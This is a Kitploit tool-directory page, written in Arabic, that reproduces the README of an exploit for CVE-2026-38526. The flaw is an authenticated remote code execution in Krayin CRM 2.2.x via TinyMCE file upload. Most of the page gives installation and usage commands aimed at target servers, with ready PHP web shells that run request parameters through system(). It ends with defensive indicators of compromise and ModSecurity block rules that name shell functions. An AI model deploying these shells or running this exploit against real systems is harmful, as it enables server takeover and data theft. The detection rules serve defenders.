Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — CVE-2026-38526 استغلال ثغرة في Krayin CRM الإصدار 2.2.x - تنفيذ أوامر عن بُعد (RCE) بعد المصادقة عبر تجاوز رفع ملفات TinyMCE. الميزات: شيل تفاعلي، حمولات متعددة الأنواع، إنشاء تلقائي للشيل، والتحقق. المؤلف: Sudeepa Wanigarathna. للاختبار المصرح به فقط. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتوليد شيفرة القشرة
GitHubcerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

KrayinCRM-RCE-Exploit-CVE-2026-38526

CVE-2026-38526 استغلال ثغرة في Krayin CRM الإصدار 2.2.x - تنفيذ أوامر عن بُعد (RCE) بعد المصادقة عبر تجاوز رفع ملفات TinyMCE. الميزات: شيل تفاعلي، حمولات متعددة الأنواع، إنشاء تلقائي للشيل، والتحقق. المؤلف: Sudeepa Wanigarathna. للاختبار المصرح به فقط.

عرض المستودع
316منذ 2 أشهرلم تتم المراجعة بعد
مشاركة

🔓 كراين CRM الإصدار 2.2.x - استغلال تنفيذ التعليمات البرمجية عن بُعد الموثَّق

License: MIT CVE-2026-38526

⚠️ لأغراض اختبار الأمن المصرح به فقط - الاستخدام غير المصرح به غير قانوني وغير أخلاقي.

📋 نظرة عامة

تثبت أداة الاستغلال هذه وجود ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد (RCE) تم اكتشافها في Krayin CRM الإصدار 2.2.x. توجد الثغرة في وظيفة رفع الملفات في TinyMCE، والتي تسمح للمسؤولين الموثَّقين برفع وتنفيذ كود PHP عشوائي على الخادم.

الخاصيةالقيمة
معرف CVECVE-2026-38526
البرنامج المتأثركراين CRM الإصدار 2.2.x
نوع الثغرةتنفيذ التعليمات البرمجية عن بُعد (RCE) موثَّق
مطلوب مصادقةنعم (صلاحيات مدير)
التأثيراختراق كامل للنظام
درجة CVSS8.8 (عالية)

🚨 تفاصيل الثغرة

تنشأ الثغرة من عدم كفاية التحقق من نوع الملف في نقطة رفع ملفات TinyMCE (/admin/tinymce/upload). يمكن للمسؤول الموثَّق:

  • رفع ملف PHP مُقنّع بنوع MIME صورة.
  • يتم تخزين الملف في موقع يمكن الوصول إليه عبر الويب.
  • يمكن للمهاجم بعد ذلك تنفيذ كود PHP عشوائي على الخادم.

الإصدارات المتأثرة

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • جميع إصدارات 2.2.x قبل إصدار التصحيح

✨ الميزات

  • أنواع شيل متعددة: أساسي، متقدم، بسيط، مدير ملفات، ومخصص.
  • شيل تفاعلي: واجهة كاملة تشبه الطرفية مع سجل الأوامر.
  • رفع الملفات: رفع ملفات إضافية عبر الشيل.
  • استخراج رمز CSRF: معالجة تلقائية لحماية CSRF.
  • دعم البروكسي: توجيه حركة المرور عبر بروكسيات HTTP/HTTPS.
  • تنسيقات مخرجات مرنة: نص، JSON، أو وضع صامت.
  • منطق إعادة المحاولة: إعادة محاولة تلقائية عند فشل الاتصال.
  • ترويسات مخصصة: دعم ترويسات HTTP مخصصة.
  • وضع تفصيلي: مخرجات تصحيح مفصلة.
  • دعم SSL: التحقق الاختياري من شهادات SSL.

📦 التثبيت

المتطلبات

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

التثبيت السريع

git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

ملف المتطلبات (requirements.txt)

httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 الاستخدام

صيغة الأمر الأساسية

python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> [OPTIONS]

المعاملات المطلوبة

المعاملالوصف
-t, --targetعنوان URL الهدف (مثال: http://192.168.1.100)
-u, --usernameاسم مستخدم المدير أو البريد الإلكتروني
-p, --passwordكلمة مرور المدير

أمثلة استخدام شائعة

# Basic exploitation with generated shell
python3 exploit.py -t http://target.com -u [email protected] -p password

# Upload custom PHP shell file
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# Generate advanced shell with interactive mode
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# Generate shell file without exploitation
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# Use with proxy for testing/debugging
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# JSON output for automation
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# Verbose mode with custom timeout
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# Custom User-Agent and headers
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 أنواع الشيل

  1. شيل أساسي (basic) تنفيذ أوامر بسيط باستخدام دالة system().

    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. شيل متقدم (advanced) شيل غني بالميزات مع:

    • طرق متعددة لتنفيذ الأوامر
    • واجهة ويب جميلة تشبه الطرفية
    • دعم سجل الأوامر
    • عرض المستخدم الحالي واسم المضيف
  3. شيل بسيط (minimal) بصمة ضئيلة للتمويه.

    <?php system($_GET["cmd"]); ?>
    
  4. مدير الملفات (file_manager) واجهة إدارة ملفات كاملة:

    • رفع الملفات
    • حذف الملفات
    • إنشاء الدليل
    • التنقل
    • عارض صلاحيات الملفات
  5. شيل مخصص (custom) استخدم ملف شيل PHP الخاص بك مع المعامل -f.

📝 تنسيقات المخرجات

تنسيق النص (افتراضي)

مخرجات ملونة قابلة للقراءة البشرية مناسبة للاستخدام التفاعلي.

تنسيق JSON (-o json)

تنسيق قابل للقراءة الآلية للأتمتة والتكامل.

{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

التنسيق الصامت (-q, --quiet)

لا مخرجات باستثناء الأخطاء. مفيد للمعالجة الدفعية.

⚙️ الخيارات المتقدمة

الخيارالوصفالافتراضي
--timeoutمهلة الطلب بالثواني30
--retryعدد محاولات إعادة المحاولة3
--retry-delayالتأخير بين المحاولات بالثواني2
--user-agentسلسلة User-Agent مخصصةوكيل المستخدم الافتراضي للمتصفح
--headerترويسات HTTP مخصصة (مفتاح: قيمة)لا شيء
--verify-sslالتحقق من شهادات SSLخطأ
--proxyعنوان URL بروكسي HTTP/HTTPSلا شيء
-v, --verboseتمكين مخرجات التصحيحخطأ
-q, --quietكتم جميع المخرجاتخطأ

مثال الترويسات المخصصة

--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 الكشف والوقاية

علامات الاختراق (IoC)

  • الملفات التي يجب مراقبتها:

    • ملفات PHP غير عادية في public/storage/upload/
    • ملفات ذات امتدادات مزدوجة (مثل image.php.jpg)
    • ملفات جديدة بأسماء مشبوهة
  • السجلات التي يجب فحصها:

    • طلبات POST إلى /admin/tinymce/upload
    • أوقات تسجيل دخول إدارية غير عادية
    • محاولات مصادقة فاشلة
  • مؤشرات النظام:

    • عمليات غير متوقعة قيد التشغيل
    • وظائف cron جديدة
    • ملفات نظام معدلة

إجراءات الوقاية

  • إجراءات فورية:

    # Update to patched version
    composer update krayin/crm
    
    # Disable admin access temporarily
    # Remove unnecessary admin accounts
    # Change all admin passwords
    
  • تعزيز أمن رفع الملفات:

    // Validate file type by content, not just extension
    // Implement content security policy
    // Use Web Application Firewall (WAF)
    // Enable file upload scanning
    
  • التحكم في الوصول:

    # Restrict admin IPs in .htaccess
    # Implement MFA for admin accounts
    # Regular admin audit
    # Session timeout policies
    
  • قواعد WAF (ModSecurity):

    # Block suspicious file uploads
    SecRule FILES "\.(php|phtml|php[0-9])" "id:1001,deny,status:403,msg:'PHP file upload blocked'"
    
    # Block web shells
    SecRule ARGS "system|exec|shell_exec|passthru" "id:1002,deny,status:403,msg:'Shell command blocked'"
    
تنزيل الأداة